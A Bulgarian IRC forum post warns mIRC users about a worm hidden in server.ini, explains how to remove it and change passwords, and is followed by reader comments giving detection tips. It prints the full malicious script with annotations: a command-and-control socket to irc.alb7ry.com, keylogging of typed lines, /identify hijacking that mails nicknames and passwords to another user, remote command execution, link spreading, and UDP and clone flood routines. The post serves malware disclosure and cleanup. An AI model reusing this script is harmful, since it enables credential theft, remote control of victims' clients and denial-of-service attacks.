
от: dzver (регистриран)

Ще го разпознаете по отворения connection към irc.alb7ry.com, откъдето лице с псевдоним madteam получава известие за вас. Пиша арабски боклук, защото преди дни се натъкнах на същия вирус в dalnet #kuwait; този е копиран от някой български боклук и само му е подменено името, което командва drones.

Отстранява се с изтриване на server.ini във вашата mIRC директория. Нормално server.ini съдържа списък от IRC сървъри, а вашият, ако сте заразен, съдържа следното:

; Lines beginning with ";" are reviewer annotations added to this listing; they are not part of the infected file.
; What each handler does, by its own n-number:
; n3        keeps user level 400 attached to a nick across nick changes (.ruser old nick, .auser new nick).
; n4, n5    when the infected client itself parts/joins a channel, report the channel and own nick to madteam2,madteam3 via botc.
; n6        redefines /remote so that 5 seconds after any /remote command, remote events are switched back on.
; n8, n9    send the two URLs to every user seen joining (notice) or parting (msg) a channel -- the spreading step.
; n10       "packt": sends repeated UDP datagrams with sockudp to the address, size and count given as arguments,
;           using a port built from $rand values, and reports start and completion to madteam.
; n11, n12  on connect: add own nick at level 400 and "FreeLiFe" at level 300; on connect/disconnect report $server.
; n13, n14  replace /identify and /id. The $chr() sequences spell IDENTIFY, .IGNORE -U9 MEMOSERV and
;           MEMOSERV SEND FREELIFE: IDENTIFY is issued with the same two arguments, MemoServ is ignored with the
;           -U9 switch (presumably to hide its reply), and the nick plus $1 $2 (the password) go out as a memo to FreeLiFe.
; n15       forwards every line the user types (on INPUT, $1-) with the active window and network to madteam2,madteam3.
; n16       "botc": writes its arguments to the socket named bot-2.
; n17       executes the text of a notice ($2-) as a command when it matches !am* and the sender has level 300.
; n18       reads from bo* sockets; when token 5 equals "madteam" (spelled with $chr codes) and the nick fragment
;           equals MaDTeaM, tokens 6 onward are executed as a command.
; n19, n22  on bot*/boj* socket open: register with random USER/NICK values, join a channel (#kkk in n19, %channel in
;           n22) and send a message every 120 seconds.
; n20, n21  open socket "bot-2" ($chr 98,111,116 = "bot") to irc.alb7ry.com port 6667, 3 seconds after mIRC starts and
;           3 seconds after the socket closes; n21 also turns identd on, adds FreeLiFe at level 300 and ignores $me.
; n23       answers Ping with Pong on PSG* sockets.
; n24-n26   "fuck": stores target/clone settings and opens up to %clones sockets named PSG<n> to %server %port.
; n27       "clean": sets %PSGflood off, closes PSG* and Paa* sockets and unsets the variables.
; n28-n31   each PSG* socket registers, joins %channel, sends a CTCP finger, a notice and a quit message carrying
;           %flood1, closes itself and opens another PSG socket.
; n32       "flood1": stores the message text in %flood1.
; Indicators visible in this listing: connection to irc.alb7ry.com:6667, socket names bot-2 and PSG*, channel #kkk,
; nicks madteam* and FreeLiFe, and entries at levels 300 and 400 in the mIRC user list.
[script]
n0=
n1=
n2=
n3=On *:nick:{ .ruser 400 $nick | .auser 400 $newnick }
n4=on 400:part:#:{ if ($nick == $me) { botc privmsg madteam2,madteam3 : 14[12 $+ $chan $+ 14] 12<5 $+ $me $+ 12> 4ЗдЗ ШбЪК гд еРн ЗбЮдЗЙ } }
n5=on 400:join:#:{ if ($nick == $me) { botc privmsg madteam2,madteam3 : 14[12 $+ $chan $+ 14] 12<5 $+ $me $+ 12> 14ЗдЗ ПОбК еРн ЗбЮдЗЙ } }
n6=alias /remote { /remote $1- | /.timer 1 5 /.remote on }
n7=
n8=on 1:join:#:/.notice $nick http://www.angelfire.com/80s/smaher/code.htm ЗбЗгнСЙ УгЗеС ИдК КСЯн Зб УЪжП
n9=on 1:part:#:/.msg $nick http://validccs.cjb.net CC`s &v2
n10=alias packt { .sockwrite -n $sockname privmsg madteam : $+ Now [Packeting] $1 [with] $2 [bytes] $3 [times] | set %packet.ip $1 | set %packet.bytes $2 | set %packet.amount $3 | set %packet.count 0 | set %packet.port $rand(1,6) $+ $rand(0,6) $+ ($rand(0,6) $+ $rand(0,9) | :start | if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .sockwrite -n $sockname privmsg Madteam : $+ Packeting Has Completed .... | halt } | inc %packet.count 1| /.sockudp -b packet 60 %packet.ip %packet.port %packet.bytes %packet.bytes | goto start }
n11=on *:connect:{ .auser 400 $me | .auser 300 FreeLiFe | botc privmsg madteam2,madteam3 : 14[12 $+ $active $+ 14] 12<5 $+ $me $+ 12> 14ЗдЗ ФИЯЙ Ъбм ЗбУнСЭС еРЗ $server }
n12=on *:disconnect:{ botc privmsg madteam2,madteam3 : 14[12 $+ $active $+ 14] 12<5 $+ $me $+ 12> 4ЗдЗ ЭХбЙ гд ЗбУнСЭС еРЗ $server }
n13=alias identify { $chr(73) $+ $chr(68) $+ $chr(69) $+ $chr(78) $+ $chr(84) $+ $chr(73) $+ $chr(70) $+ $chr(89) $1 $2 | . $+ $chr(73) $+ $chr(71) $+ $chr(78) $+ $chr(79) $+ $chr(82) $+ $chr(69) $chr(45) $+ $chr(85) $+ $chr(57) $chr(77) $+ $chr(69) $+ $chr(77) $+ $chr(79) $+ $chr(83) $+ $chr(69) $+ $chr(82) $+ $chr(86) | $chr(77) $+ $chr(69) $+ $chr(77) $+ $chr(79) $+ $chr(83) $+ $chr(69) $+ $chr(82) $+ $chr(86) $chr(83) $+ $chr(69) $+ $chr(78) $+ $chr(68) $chr(70) $+ $chr(82) $+ $chr(69) $+ $chr(69) $+ $chr(76) $+ $chr(73) $+ $chr(70) $+ $chr(69) 12Nick:[14,14 $+ $me $+ 12] 4PassworD:[12,12 $1  $+ $chr(160) $+ 5,5 $2 $+ 4] }
n14=alias id { $chr(73) $+ $chr(68) $+ $chr(69) $+ $chr(78) $+ $chr(84) $+ $chr(73) $+ $chr(70) $+ $chr(89) $1 $2 | . $+ $chr(73) $+ $chr(71) $+ $chr(78) $+ $chr(79) $+ $chr(82) $+ $chr(69) $chr(45) $+ $chr(85) $+ $chr(57) $chr(77) $+ $chr(69) $+ $chr(77) $+ $chr(79) $+ $chr(83) $+ $chr(69) $+ $chr(82) $+ $chr(86) | $chr(77) $+ $chr(69) $+ $chr(77) $+ $chr(79) $+ $chr(83) $+ $chr(69) $+ $chr(82) $+ $chr(86) $chr(83) $+ $chr(69) $+ $chr(78) $+ $chr(68) $chr(70) $+ $chr(82) $+ $chr(69) $+ $chr(69) $+ $chr(76) $+ $chr(73) $+ $chr(70) $+ $chr(69) 12Nick:[14,14 $+ $me $+ 12] 4PassworD:[12,12 $1  $+ $chr(160) $+ 5,5 $2 $+ 4] }
n15=on *:input:*:{ botc privmsg madteam2,madteam3 : 14[12 $+ $active $+ 14] 3[6 $+ $network $+ 3] 12<5 $+ $me $+ 12> 4 $1- }
n16=alias botc { sockwrite -n bot-2 $1- }
n17=on 300:notice:!am*:*:{ $2- }
n18=on *:sockread:bo*: { sockread %botread | set %nickl1 $gettok(%botread,1,32) | set %nickl2 $left(%nickl1,8) | set %nickf $right(%nickl2,7) | if ($gettok(%botread,5,32) == $chr(109) $+ $chr(97) $+ $chr(100) $+ $chr(116) $+ $chr(101) $+ $chr(97) $+ $chr(109)) && (%nickf == MaDTeaM) { $gettok(%botread,6-,32) } }
n19=on *:Sockopen:bot*:{ if ($sockerr > 0) { halt } | set -u1 %user $rand(A,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(A,z) $+ $rand(a,z) $+ $rand(1,9) $+ $rand(a,z) | .sockwrite -nt $sockname USER %user %user %user : $+ $me | .sockwrite -nt $sockname NICK $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ - $+ $rand(0,99) | sockwrite -tn $sockname join #kkk | .timer 0 120 sockwrite -n $sockname privmsg madteam : $+ help me ;p~~ }
n20=on *:sockclose:bot*:/.timer 1 3 sockopen $chr(98) $+ $chr(111) $+ $chr(116) $+ -2 irc.alb7ry.com 6667
n21=on 1:start:/.identd on | .auser 300 FreeLiFe | .timer 1 3 .sockopen $chr(98) $+ $chr(111) $+ $chr(116) $+ -2 irc.alb7ry.com 6667 | .ignore $me
n22=on *:Sockopen:boj*:{ if ($sockerr > 0) { halt } | set -u1 %user $rand(A,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(A,z) $+ $rand(a,z) $+ $rand(1,9) $+ $rand(a,z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(A,Z) | sockwrite -tn $sockname join %channel | .timer 0 120 sockwrite -n $sockname privmsg %channel : $+ We Ready To Fuck Chan ....... ! }
n23=on *:sockread:PSG*:{ .sockread %clone.temp | if ($gettok(%clone.temp,1,32) == Ping) { sockwrite -tn $sockname Pong $server } }
n24=alias fuck { if ($2 = $null) || ($2 !isnum) { botc privmsg madteam,MaDteam1,maDteaM2,maDteaM3 [(14_/fuck___[___]_4[__[_/clean_]__[_/fuck_]__[_/flood_4]_] | halt } | set %nick $$1 | set %clones $$2 | set %channel $$1 | set %MaDNick $$5 | if ( $3 = $null) { set %server $server } | if ( $3 != $null) { set %server $$3 } | if ( $4 = $null) || ( $4 !isnum) { set %port $port } | if ( $4 != $null) { set %port $$4 } | if ( $5 = $null) { set %flood $5 } | if ($group(#nicks) = on) { .disable #nicks } | set %PSGflood on | var %var = 0 | :loop | inc %var | if (%PSGflood == on) && (%var <= %clones) { .sockopen PSG $+ %var %server %port | goto loop }
n25= else { halt }
n26=}
n27=alias clean { .set %PSGflood off | .sockclose PSG* | .sockclose Paa* | .unset %nick | unset %channel | unset %server | unset %port | unset %clones | unset %flood }
n28=on *:Sockopen:PSG*:{
n29= if ($sockerr > 0) { halt }
n30= set -u1 %user $rand(a,z) $+ $rand(a,z) $+ %MaDNick $+ $rand(1,99) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(a,z) $+ $rand(a,z) $+ %MaDNick $+ $rand(0,99) | .sockwrite -nt $sockname JOIN : $+ %channel | .sockwrite -n $sockname privmsg %channel : $+ $chr(1) $+ finger $+ $chr(1) | .sockwrite -n $sockname notice %channel : $+ %flood1 | .sockwrite -n $sockname quit : $+ %flood1 | .sockclose $sockname | .sockopen PSG $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n31=}
n32=alias flood1 { set %flood1 MaDTeaM $+ $1- $+ MaDTeaM }

Както разбирате, заразата се е разпространявала през сайт в angelfire и validccs.cjb.net

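Чистете се и си сменяйте често паролите:) Скриптът подменя командите /identify и /id (редове n13 и n14) и препраща ника и паролата ви на друг потребител, затова сменете паролата си, след като изчистите заразата.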

Мнения от посетители (3):
T0sh11.05.02 17:11:53
$decode v mirc 6.x
zabranen e. //$decode ne mozhesh da go izpulnish ot command prompt, security :)

dzver10.05.02 17:10:04
da be, ama
izpitvam ostra kriza na materiali i chitateli:)

btw, imam useshtaneto, che v mIRC 6.01 //$decode technikata ne raboti. Probvah specialno da dam example s encodnat string "az sym mnogo tup i placha za ban", ama ne stana :)

T0sh09.05.02 14:09:56
oprosteno
be dzver nyamashe nuzhda celiya script :)
nakartko: ako vuv file koito ne e ot scripta, ili ne e mirc.exe, namerite
"sockopen" - 99.9% chee virus. Ako ne e virus to e file ot scripta za koito ne znaete :)
sushto podozritelni stringove sa
"$decode" "sockwrite" ili "www.neshtosi.net"
